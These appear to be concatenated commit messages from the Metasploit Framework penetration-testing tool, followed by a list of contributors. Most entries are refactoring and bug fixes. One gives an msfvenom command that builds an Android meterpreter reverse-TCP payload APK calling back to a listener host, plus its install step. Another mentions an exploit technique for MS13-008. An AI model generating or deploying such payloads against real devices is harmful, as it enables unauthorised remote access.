[#47720609]
Msf::PayloadSet#add_module does NOT return an annotated module class as
Msf::ModuleSet#add_module does because a payload module is defined as a
ruby Module instead of a ruby Class. Since add_module doesn't always
return an annotated_class, the logic in
Msf::ModuleManager#on_module_load needed to change to NOT use
annotated_class and create #add_module as return [void]. Thus, it is
necessary to pass in all the metasploit module metadata to
Msf::ModuleManager#cache_in_memory instead of assuming they can be
derived from the (payload) Module or (other) Class.
[#47720609]
Msf::ModuleManager#module_info_by_path was not being updated when a
module was loaded, so if a load_module was called again, say during
start up of prosvc, the module would reload even though there was no
change in the file because file_changed? couldn't find an entry for the
module's path in module_info_by_path.
[#47720609]
Fix some docs and variable names to make it clearer when methods are
expecting module instance and module classes. Change some 'name'
variables to 'reference_name' since that's the proper terminology.
[#50179803]
[SeeRM #7967]
[SeeRM #7870]
Because metasploit-framework runs migrations with the same process and
with the same connection as it later accesses the database, the column
information can become cached prematurely and be incorrect by the end of
the migrations. Fix the bad cache by automatically resetting the column
information for all model classes after the migrations have run.
[#50179803]
Move Msf::DBManager#migrate and the migrated attribute to
Msf::DBManager::Migration module to lower complexity of db_manager.rb
and in preparation for more migration related code on this branch.
Allows console users to use the 'run' command for exploits as well as
auxiliary and post, in the same way that 'exploit' works for all three.
Saves some typing and makes it do the right thing so users don't have to
remember what kind of module they're using.
- Added sorting to cmd_notes
- Added make_sortable function so that sorts work happily even
when the disparate notes don't have content of the same types
in the fields the sort is requested over.
[#50099107]
If Msf::DBManager#initialize_metasploit_data_models is run multiple
times, such as during specs, ActiveRecord::Migrator.migrations_paths was
getting populated with multiple copies of the metasploit_data_models
db/migrate path, which would lead to 'DB.migrate threw an exception:
Multiple migrations have the version number 0' errors in framework.log.
IO#read returns nil for an empty file if given a length argument, which
caused a stack trace when attempting to import a file instead of a
useful error message.
This function takes advantage of MSTIME's CTIMEAnimationBase::put_values
function that's suitable for a no-spray technique (based on wtfuzz's
PoC for MS13-008)
When hashes for params contain nils, they should be converted to empty
strings instead of crashing.
* #to_s: Calls #to_s on vars_get and vars_post data
* #set_encode_uri: Calls #to_s on its arg
When a module is configured to listen on the INADDR_ANY interface, with
a payload that does not have an LHOST option, it attempts to determine
the srvhost from a client socket which would only be available when the
module has included the TcpClient mixin (i.e., it is both passive and
aggressive stance), causing a NameError for the undefined +sock+.
This commit fixes the problem in two ways:
1. It changes the default cli in get_uri to be the module's self.cli,
which should always be set when passive modules would need it (e.g., in
the on_request_uri method).
2. It adds a check to make sure that the calling module has a sock
before trying to get its peerhost. This was @marthieubean's suggested
solution in #1775.
[Closes#1775]
An earlier change to the framework (prepend_migrate) forced single
payloads to use the internal_generate method of payload.rb.
internal_generate calls build which has a cache to track assembled
payloads. This method assumes that a payload only needs to be
assembled once, with optional values patched in later.
Single payloads do not work this way. Each time they are generated
new assembly source is created with the options hardcoded in.
This fix updates build to use the hashcode of the assembly code as
part of the cache key.
This fixes#7898 -- a bug that prevents a user from generating
multiple variations of a single payload without a restart.
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
[#46491831]
I missed that Rex::Ui::Text::Output was a class and not a module, so
starting up prosvc fell over when it loaded
rex/ui/text/output/buffer/stdout, which also would screw up
msf/ui/console/command_dispatcher/core.rb where I original added
Rex::Ui::Text::Output::Buffer::Stdout.
[#46491831]
Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns. The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
[#46491831]
Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call. By removing the ##, the
warning disappeared. I did not determine what is special about ## in
file comments.
store_local calls report note from db.rb directly instead of going
through the report method. this means we might miss the workspace
causing a stack trace
Not only does this remove the patch, but adds in specs to cover the test
cases that the patch resolved. Verified all steps and landed #1592 before
landing #1611, so this is complete.
[Closes#1611]
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.
This reverts commit 52596ae3b4.
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.
[Closes#1320]
Conflicts:
lib/msf/ui/console/command_dispatcher/core.rb
[#46224565]
The following rake tasks are added and work similar to how they work in
rails apps:
* db:create
* db:drop
* db:migrate
* db:migrate:status
* db:rollback
* db:schema:dump
* db:schema:load
* db:seed (but no db seeds defined at this time)
* db:setup
* db:version
The hidden task db:test:prepare is also available, which means `rake
spec` can depend on it so that the test database is dropped and
recreated from the development database when running specs (Although
there are yet to be database tests, this branch is in preparation for
that work that will be split between multiple developers.)
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
David Maloney
xard4s
Luke Imhoff
sinn3r
James Lee
agix
John Sherwood
Alexandre Maloteaux
bannedit
Tod Beardsley
Tasos Laskos
Joshua J. Drake
jvazquez-r7
sinn3r
kernelsmith
Meatballs
Raphael Mudge
Nathan Einwechter
Josh
Tod Beardsley
timwr
scriptjunkie
Rob Fuller
Brandon Turner
Joshua Abraham